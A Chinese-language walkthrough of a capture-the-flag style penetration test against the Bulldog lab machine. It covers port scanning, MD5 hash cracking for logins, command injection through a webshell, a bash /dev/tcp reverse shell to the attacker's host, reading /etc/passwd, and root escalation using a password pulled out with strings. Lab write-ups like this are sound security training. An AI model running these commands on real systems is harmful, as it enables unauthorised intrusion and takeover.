一、環境
攻擊機(kali)
靶機(ubuntu)
二、資訊打點
1、確認目標機器以及埠收集
使用fscan工具進行測試
./fscan -h 192.168.2.0/24
發現目標開放了80和8080埠,然後就是正常的去訪問一下
開啟之後都是這個頁面,然後對這個頁面的功能點進行點選,發現沒啥有用的資訊
2、嘗試目錄掃描
三、滲透測試
發現存在登陸的介面,一個一個嘗試訪問,看看有沒有什麼敏感的資訊
/robots.txt
/dev
出現一串資訊,然後發現頁面最低下有一些特別的資訊
然後我就猜測這些郵箱會不會是賬號之類的,然後就是開啟前段程式碼看一下
出現一堆雜湊值,然後就是嘗試一下md5解密,最後解密了半天只有最後兩個可以解密成功
整理一下有用的資訊
nick@bulldogindustries.com bulldog
sarah@bulldogindustries.com bulldoglover
然後嘗試訪問登陸頁面
登陸
發現使用郵箱登陸不可行,於是一看郵箱前面那個應該可能是使用者,嘗試登陸
登陸成功,果然登陸只需要輸入前面的使用者名稱就行了
然後看了一圈登陸後的頁面,沒什麼東西,然後想著dev目錄下有一個webshell的連結,只不過得登陸之後才能訪問,現在已經登陸,可以直接訪問了
看到這個頁面我就想起了可能存在命令執行漏洞
echo | id 檢視一下當前使用者的ID
命令可以執行,那麼想著能不能反彈shell呢
echo "bash -i >& /dev/tcp/192.168.2.130/8888 0>&1" |bash 反彈shell
kali開啟監聽
執行命令
發現shell彈成功了,只不過許可權有點低
四、提權
1、先檢視一下當前使用者有哪些
django@bulldog:/home/django/bulldog$ cat /etc/passwd
cat /etc/passwd
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12👨/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync❌100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network❌101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve❌102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy❌103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog❌104:108::/home/syslog:/bin/false
_apt❌105:65534::/nonexistent:/bin/false
lxd❌106:65534::/var/lib/lxd/:/bin/false
messagebus❌107:111::/var/run/dbus:/bin/false
uuidd❌108:112::/run/uuidd:/bin/false
dnsmasq❌109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
bulldogadmin❌1000:1000:bulldogadmin,,,:/home/bulldogadmin:/bin/bash
django❌1001:1001:,,,:/home/django:/bin/bash
sshd❌110:65534::/var/run/sshd:/usr/sbin/nologin
然後發現bulldogadmin這個使用者,於是可以訪問這個目錄看一下
然後發現了這個目錄,繼續訪問
使用cat命令檢視customPermissionApp檔案時會出現一些亂碼,無法找到一些有用的資訊,所以可以嘗試使用strings命令進行檢視
strings customPermissionApp
出現了幾行字串,然後嘗試拼接一下說不定就是密碼,嘗試了之後發現每行後面的H是用來混淆的,直接去掉,
password:SUPERultimatePASSWORDyouCANTget
然後嘗試登陸,發現直接使用 su -是無法直接登陸還報錯,於是嘗試使用python進行提權
python -c 'import pty; pty.spawn("/bin/bash")'
呼叫本地的 shell
接著輸入 sudo su
然後發現許可權變成root了,成功提權